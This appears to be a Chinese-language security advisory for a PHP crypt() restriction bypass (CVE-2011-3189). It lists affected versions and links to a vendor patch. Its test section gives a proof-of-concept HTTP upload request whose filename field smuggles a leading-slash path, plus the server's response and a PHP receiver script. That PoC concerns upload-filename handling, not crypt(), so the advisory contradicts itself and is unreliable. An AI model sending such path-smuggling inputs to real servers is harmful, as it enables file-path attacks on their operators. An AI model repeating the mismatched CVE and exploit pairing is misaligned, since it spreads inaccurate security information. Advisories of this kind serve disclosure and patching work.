PHP “crypt()”函数安全限制绕过漏洞

hhxywlzx 2012-02-04

发布日期:2012-02-02
更新日期:2012-02-03

受影响系统:
Apple MacOS X Server 10.x
PHP PHP 5.3.7
PHP PHP 5.3.6
PHP PHP 5.3.5
不受影响系统:
Apple MacOS X Server 10.7.3
PHP PHP 5.3.8
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 49376
CVE ID: CVE-2011-3189

PHP是一种在电脑上运行的脚本语言,主要用途是在于处理动态网页,包含了命令行运行接口或者产生图形用户界面程序。

PHP在crypt()函数的实现上存在安全漏洞,攻击者可利用此漏洞绕过某些安全限制。

<*来源:Jo of feuersee.de
  *>

测试方法:
--------------------------------------------------------------------------------
警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

HTTP Request:
====
POST /file-upload-fuzz/recv_dump.php HTTP/1.0
host: blog.security.localhost
content-type: multipart/form-data; boundary=----------ThIs_Is_tHe_bouNdaRY_$
content-length: 200

------------ThIs_Is_tHe_bouNdaRY_$
Content-Disposition: form-data; name="contents"; filename="/anything.here.slash-will-pass";
Content-Type: text/plain

any
------------ThIs_Is_tHe_bouNdaRY_$--

HTTP Response:
====
HTTP/1.1 200 OK
Date: Fri, 27 May 2011 11:35:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 30
Connection: close
Content-Type: text/html

/anything.here.slash-will-pass

PHP script:
=====
<?php
if (!empty($_FILES['contents'])) {  // process file upload
    echo $_FILES['contents']['name'];
    unlink($_FILES['contents']['tmp_name']);
}

建议:
--------------------------------------------------------------------------------
厂商补丁:

PHP
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.php.net

相关推荐